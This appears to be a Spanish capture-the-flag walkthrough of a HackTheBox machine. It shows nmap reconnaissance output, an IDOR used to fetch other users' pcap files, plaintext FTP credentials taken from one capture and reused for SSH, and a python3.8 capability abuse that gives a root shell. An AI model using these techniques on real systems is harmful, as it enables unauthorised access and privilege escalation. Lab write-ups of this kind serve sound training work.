Primero nos conectamos a la VPN de HackTheBox usando openvpn luego de haberla descargado desde la página de HTB.
sudo openvpn lab_stamin4.ovpn
Port scanning
Realizamos un escaneo para detectar puertos abiertos.
sudo nmap -p- --open -sS -Pn -n -v 10.10.10.245 -oN portScan
[sudo] password for stamin4:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 17:56 -03
Initiating SYN Stealth Scan at 17:56
Scanning 10.10.10.245 [65535 ports]
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245
Discovered open port 21/tcp on 10.10.10.245
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.90% done; ETC: 17:58 (0:01:36 remaining)
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 8.58% done; ETC: 17:58 (0:01:47 remaining)
SYN Stealth Scan Timing: About 41.18% done; ETC: 17:59 (0:01:31 remaining)
SYN Stealth Scan Timing: About 67.28% done; ETC: 17:59 (0:00:46 remaining)
Completed SYN Stealth Scan at 17:58, 127.71s elapsed (65535 total ports)
Nmap scan report for 10.10.10.245
Host is up (0.26s latency).
Not shown: 65509 closed tcp ports (reset), 23 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 127.94 seconds
Raw packets sent: 80970 (3.563MB) | Rcvd: 78973 (3.427MB)
Los puertos abiertos son: 21, 22 y 80. Ahora lanzamos un conjunto de scripts básicos de reconocimiento para obtener más información sobre los servicios que están corriendo en la máquina.
nmap -sCV -p21,22,80 -oG openPorts 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 18:33 -03
Nmap scan report for 10.10.10.245
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Mon, 30 Sep 2024 21:33:16 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 30 Sep 2024 21:33:09 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 30 Sep 2024 21:33:10 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=9/30%Time=66FB1915%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2F4C,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\
SF:x20Mon,\x2030\x20Sep\x202024\x2021:33:09\x20GMT\r\nConnection:\x20close
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:19386\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\
SF:">\n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20
SF:\x20<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x
SF:20\x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"im
SF:age/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/
SF:font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\
SF:x20href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20r
SF:el=\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20
SF:\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.mi
SF:n\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/stati
SF:c/css/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOpt
SF:ions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Mon,
SF:\x2030\x20Sep\x202024\x2021:33:10\x20GMT\r\nConnection:\x20close\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20HEAD,\x2
SF:0OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20t
SF:ext/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\
SF:x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<bod
SF:y>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Inv
SF:alid\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version:\x20'R
SF:TSP/1\.0''\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,
SF:189,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x
SF:20Mon,\x2030\x20Sep\x202024\x2021:33:16\x20GMT\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202
SF:32\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\
SF:x20Final//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</
SF:h1>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20
SF:server\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x2
SF:0check\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.65 seconds
FTP
Ya que el puerto 21 está abierto, probamos si está habilitado el usuario anonymous para conectarnos sin contraseña. Sin embargo, no es el caso :(
ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:stamin4): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
HTTP
Como no disponemos de credenciales para conectarnos por FTP o SSH, la única vía de intrusión restante es HTTP. Al dirigirnos a la web, nos encontramos con un dashboard:
En IP Config se ve el output del comando ifconfig ejecutado a nivel de sistema.
De igual forma, en Network Status se encuentra el output de netstat.
En la sección Security Snapshot tenemos la opción de descargar un archivo pcap.
Si lo analizamos con tshark, no veremos nada interesante. Es tráfico HTTP desde nuestra IP.
En la URL hay un 2, por eso se descarga el archivo 2.pcap. Si alteramos este número, podemos descargar otros archivos que pueden contener información que quizá corresponda a otros usuarios, explotando de esta manera un IDOR (Insecure Direct Object Reference).
Analizamos la captura con tshark.
tshark -r 0.pcap 2>/dev/null
Podemos ver credenciales de FTP en texto plano.
Nos conectamos a FTP con el usuario nathan y la contraseña Buck3tH4TFORM3!.
Con get user.txt nos descargamos la primera flag.
También podemos reutilizar las credenciales para conectarnos por SSH como nathan.
ssh nathan@10.10.10.245
Privilege Escalation
Para listar las capabilities de la máquina, usamos el comando getcap junto al parámetro -r de recursive para obtener las capabilities de forma recursiva desde la raíz del sistema. Redirigimos los errores al /dev/null.
De entre las capabilities, podemos abusar de python3.8 para cambiar el uid y convertirnos en root de la siguiente forma:
Con python3.8 importamos la librería os que nos permitirá ejecutar comandos. Luego, con os.setuid(0) cambiamos el uid a 0, que corresponde al del usuario root. Finalmente, con os.system ejecutamos el comando bash para que se nos otorgue una consola como root.
python3.8
import os
os.setuid(0)
os.system("bash")
Nos movemos al directorio root y ya podremos ver la flag.
